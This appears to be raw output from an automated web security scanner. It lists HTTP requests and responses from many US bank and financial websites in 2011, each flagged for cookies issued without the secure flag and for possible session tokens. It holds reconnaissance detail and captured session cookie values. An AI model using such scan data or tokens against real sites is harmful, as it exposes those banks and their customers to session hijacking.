GET /internetBanking/en_us/info/ContactUsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14537 Set-Cookie: JSESSIONIDRIB09=0000ow2BUtOGja-8V-F7CZsYAu6:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /planning/investments.action HTTP/1.1 Host: www6.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the secure flag set:
v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/login.aspx HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 4559 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:00 GMT Connection: close
The following cookie was issued by the application and does not have the secure flag set:
v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /chaseonline/reidentify/sso_reidentify.jsp HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 167 Content-Type: text/html; charset=utf-8 Expires: -1 Location: /Public/Reidentify/ReidentifyFilterView.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:01:53 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fPublic%2fReidentify%2fReidentifyFilterView.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/Reporting.js HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Length: 70473 Content-Type: application/x-javascript Content-Location: https://chaseonline.chase.com/js/Reporting.js Last-Modified: Mon, 06 Dec 2010 18:24:12 GMT Accept-Ranges: bytes ETag: "02ebcc77295cb1:51e6" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:01:52 GMT Connection: close
var CHASE=CHASE||{};CHASE.analytics=(function(){var analyticsConfig=new(function Config(){this.Enabled=true;this.PageDotPathSet=false;this.Initialized=false;this.DelayTag=false;this.DebugMode=true;th ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/ifsewwwc?Logon HTTP/1.1 Host: myaccounts.navyfcu.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /signon HTTP/1.1 Host: online.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:02:13 GMT Cache-Control: no-cache="set-cookie" X-Cnection: close Location: https://online.wellsfargo.com/login?LOB=BIZ&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com; Set-Cookie: ISD_DAS_COOKIE=Zwt2abN8dLgwD7E5lQAAAAAAA5lwAI7oMlzo4nNgjH5Nn3E7KNFroc2SxeqP8qV8CZgGCvTIC19wEM8=;path=/;domain=.wellsfargo.com; Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://online.wellsfargo.com/logi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/AuthService HTTP/1.1 Host: onlineservices.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:02:13 GMT Server: IBM_HTTP_Server Set-Cookie: TLTSID=16FB92962F18102F5856F16EF5F79C09; Path=/; Domain=.wachovia.com Cache-Control: no-store Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: AuthSvsSessionID=IzW+wP+VVHuq0l/F/NqxgmwCKP0=55 4N.LEInmgXLF30lFrJTXIXXWgrr.1012025; HttpOnly; Path=/; Domain=.wachovia.com; Secure x-frames-option: deny Connection: close Content-Type: text/html Content-Language: en Content-Length: 13099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--
The following cookie was issued by the application and does not have the secure flag set:
v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccounts.aspx HTTP/1.1
Host: resources.cardmemberservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 170
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://online.cardmemberservices.com/MyAccounts.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
Date: Wed, 02 Feb 2011 22:02:19 GMT
Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://online.cardmemberservices.com/MyAccounts.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccounts.aspx HTTP/1.1
Host: resources.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 162
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://chaseonline.chase.com/MyAccounts.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:02:19 GMT
Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://chaseonline.chase.com/MyAccounts.aspx">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1
Host: s.xp1.ru4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1
Host: stg.xp1.ru4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c?siteid=429&ccID=BOA_HOME_SIGNON_SERVICE_01&ccID=BOA_HOME_SIGNON_SERVICE_02&ccID=BOA_HOME_SIGNON_SERVICE_03&ccID=BOA_HOME_SIGNON_HERO&location=https%3A%2F%2Fwww.bankofamerica.com%2Fhomepage%2Foverview.go%3FBOA_0020%3D999%26tc_lang%3Den_US%26state%3Dnull%26BA_0021%3Dnull%26BOA_HPR%3Dnull HTTP/1.1
Host: tc.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Wed, 02 Feb 2011 22:02:37 GMT
Last-Modified: Wed, 02 Feb 2011 22:02:37 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Set-Cookie: TCID=0007ae71-99a3-d958-8d17-88470000005a;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:02:37 GMT;
Connection: Keep-Alive
Content-Length: 563
Content-Type: text/javascript; charset=ISO-8859-1
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:02:38 GMT;path=/;domain=bankofamerica.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/lost-password-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/partner-portal-home.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /register.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /retirementcenter HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:19 GMT
Server: Apache
Set-Cookie: v1st=FBBE6C4A1C9B8436; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE11NZZZintmktgD4; expires=Sun, 03-Apr-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:18 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39529
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/gateway/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:12:45 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com
Location: http://www.capitalone.com/creditcards/?
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /indexn.php HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.capitalone.c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/thirdparty/xplus1/xp1vars.js.php HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:21 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:20 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: application/x-javascript
Content-Length: 125
var xp1CC = ""; var xp1zip = "0"; var xp1region = "national"; var xp1eosSet = "N"; var xp1PageName = "";
The following cookie was issued by the application and does not have the secure flag set:
v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:00:30 GMT
Content-length: 22894
Content-type: text/html
Set-Cookie: v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Wed, 02 Feb 2011 15:05:03 GMT
Etag: "596e-4d49729f"
Accept-ranges: bytes
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head> ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wamuwelcome3/ HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:00:50 GMT
Content-length: 14892
Content-type: text/html
Set-Cookie: v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Thu, 06 Jan 2011 22:25:12 GMT
Etag: "3a2c-4d264148"
Accept-ranges: bytes
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /NASApp/NetAccess/LoginDisplay HTTP/1.1
Host: www.ibsnetaccess.com
Connection: keep-alive
Referer: http://www.ibsnetaccess.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C697A0BA2F17102F003A8D446414B7D1; TLTUID=C697A0BA2F17102F003A8D446414B7D1
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.myschedule.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Length: 15100
Content-Type: text/html
Content-Location: http://www.myschedule.navyfederal.org/Default.htm
Last-Modified: Wed, 07 Nov 2001 15:10:00 GMT
Accept-Ranges: bytes
ETag: "014cf449e67c11:5e8"
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:19:30 GMT
Connection: close
Set-Cookie: TS26bd7b=a65ecccc74731a368fe90c1afa57c1bee8233e9e4dea5aa14d49d874; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /my/charteroneinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: FWS/7.0
Date: Wed, 02 Feb 2011 22:19:32 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=ICnV^lPuGcmwLOC9l5HCSfEXjIkSAk1J2HQKA0w6IAAOywABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT
Set-cookie: spc=311; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=48E9C3976D90BB921D5C93D8E938BE52; path=/; secure
Content-length: 264
Content-type: text/html
Fsreqid: REQ4d49d8740a034c3a20000ecb0000aa33
Fscalleeid: ibweb311
Fselapsedtime: 9719
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /my/citizensinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: FWS/7.0
Date: Wed, 02 Feb 2011 22:19:32 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=^dlv6nLB_DEtlMTGowZrrNRWb_gSAk1J2HQKA0w6IAAO3QABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT
Set-cookie: spc=321; path=/
Cache-control: public
Set-cookie: HttpOnly
